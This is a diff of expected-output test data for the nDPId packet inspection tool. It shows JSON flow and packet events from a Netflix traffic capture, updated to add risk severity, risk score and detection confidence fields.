-01017{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7vga1YT37t1VqAS\/\/\/ATQAAAgQFtAEDAwkEAggKs1tjeh9lEJY="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7h\/u26MapfAlqAS\/\/8KPAAAAgQFtAEDAwkEAggKFFAqwB9lEIw="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7qJ1p961ZDNAaAS\/\/87aAAAAgQFtAEDAwkEAggKTYEN7B9lEJM="}
@@ -222,19 +223,19 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gLJAAEAG1N\/AqAEHF\/YLjc+4AFBql8CWf7tujYAQEBUowwAAAQEICh9lEL4UUCrA"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0s8BAAEAGodHAqAEHF\/YLjc+6AFDVkM0Bidafe4AQEBVZ9gAAAQEICh9lEL5NgQ3s"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1484319056279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319056279,"pkt":"gCqoTGHM5JjWH70UCABFAAA0AZpAAEAGU\/jAqAEHF\/YLjc+5AFBMFfUFz2h9PYAQEBUYcgAAAQEICh9lEL40r6Zm"}
-01018{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
-01017{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
-01018{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
-01020{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1484319056303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319056303,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7wVYmHmLePyuKAS\/\/9RBgAAAgQFtAEDAwkEAggKED1piB9lEJo="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1484319056313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319056313,"pkt":"gCqoTGHM5JjWH70UCABFAAA0DEJAAEAGSVDAqAEHF\/YLjc+8AFAt4\/K4FWJh54AQEBVvgQAAAQEICh9lENgQPWmI"}
-01020{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz72N4Tx+gHq67aAS\/\/8YZwAAAgQFtAEDAwkEAggKc9HQqh9lEJ4="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz749DprObTkJu6AS\/\/9Z3AAAAgQFtAEDAwkEAggKxO\/1DB9lEJ4="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BrtAAEAGTtfAqAEHF\/YLjc+9AFCAerrtjeE8f4AQEBU20gAAAQEICh9lEOxz0dCq"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Fj1AAEAGP1XAqAEHF\/YLjc++AFBtOQm7PQ6az4AQEBV4RwAAAQEICh9lEOzE7\/UM"}
-01019{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
-01018{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064590,"flow_last_seen":1484319064590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319064590,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1484319064590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319064590,"pkt":"gCqoTGHM5JjWH70UCABFAABAVptAAEAGBuzAqAEHF\/YDjM+\/AFBrAzOSAAAAALAC\/\/+cMAAAAgQFtAEDAwUBAQgKH2UvkQAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064593,"flow_last_seen":1484319064593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319064593,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -243,94 +244,94 @@
